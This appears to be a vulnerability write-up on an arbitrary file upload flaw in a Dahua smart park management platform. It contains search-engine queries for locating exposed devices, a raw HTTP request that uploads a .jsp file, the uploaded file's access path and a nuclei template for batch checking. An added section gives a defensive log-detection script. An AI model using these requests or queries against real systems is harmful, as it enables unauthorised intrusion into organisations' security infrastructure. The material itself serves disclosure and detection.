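Dahua Smart Park Integrated Management Platform devicePoint_addImgIco arbitrary file upload vulnerability
Vulnerability overview
Dahua Smart Park Integrated Management Platform is an integrated management platform offering park operations, resource allocation and intelligent services. The platform is intended to help optimize the allocation of park resources and meet diverse management needs, while improving the user experience through intelligent services. The Dahua smart park device exposes a file upload function but does not strictly restrict or filter the uploaded file's type, size, format or path, so an attacker can craft a malicious file and upload it to the device.
Vulnerability reproduction
FOFA query: "/WPMS/asset/lib/gridster/"
or app="dahua-智慧园区综合管理平台"
Hunter query: web.body="/WPMS/asset/lib/gridster/"
The login page looks like this:
PoC: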
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: IP
Content-Length: 226
Expect: 100-continue
Connection: close

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--
Access the uploaded file
/upload/emap/society_new/ico_res_ffe925764fee_on.jsp
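On the defensive side, the upload request and the follow-up fetch of a script under the upload directory both leave entries in the web access log. The following detection sketch is an added example, not part of the original post; it assumes a combined-format access log, and the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Endpoint and upload directory come from the write-up; the combined-log layout is an assumption.
UPLOAD_ENDPOINT = "/emap/devicepoint_addimgico"
UPLOAD_DIR = "/upload/emap/"
SCRIPT_EXT = (".jsp", ".jspx")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})\b')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /upload/emap/society_new/ico_res_000000000000_on.png HTTP/1.1" 200 2048
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 58
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /upload/emap/society_new/ico_res_ffe925764fee_on.jsp HTTP/1.1" 200 10
203.0.113.5 - - [01/Jan/2024:11:30:00 +0000] "GET /upload/emap/society_new/x.JSP;a=b HTTP/1.1" 404 0
"""

def normalize(uri):
    """Drop the query string, URL-decode, strip ;path-parameters, lowercase."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r";[^/]*", "", path).lower()

def find_suspicious(lines):
    """Map client IP -> list of (kind, timestamp, path, status) in log order."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, status = normalize(m["uri"]), int(m["status"])
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            findings[m["ip"]].append(("upload_request", m["ts"], path, status))
        elif path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXT):
            findings[m["ip"]].append(("script_in_upload_dir", m["ts"], path, status))
    return dict(findings)

def confirmed_chain(findings):
    """IPs whose upload request was later followed by a 200 for a script in the upload dir."""
    hits = []
    for ip, events in findings.items():
        kinds = [e[0] for e in events]
        if "upload_request" in kinds:
            later = events[kinds.index("upload_request") + 1:]
            if any(k == "script_in_upload_dir" and st == 200 for k, _, _, st in later):
                hits.append(ip)
    return sorted(hits)

if __name__ == "__main__":
    found = find_suspicious(SAMPLE_LOG.splitlines())
    print(found, confirmed_chain(found))
```

A `script_in_upload_dir` finding is worth triage on its own, since the upload and the later fetch can come from different client addresses; an image icon directory has no reason to serve `.jsp` files.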
nuclei YAML file for batch checking
id: Dahua_devicePoint_addImgIco_upload

info:
  name: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
  author: mhb17
  severity: critical
  description: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
  reference:
    - https://
  tags: fileupload

requests:
  - raw:
      - |-
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Content-Length: 226
        Expect: 100-continue
        Connection: close

        --f3aeb22be281d77542546a2f71e20982
        Content-Disposition: form-data; name="upload"; filename="b.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        h4jc4K1lT4
        --f3aeb22be281d77542546a2f71e20982--

    matchers:
      - type: word
        part: body
        words:
          - '"code":1'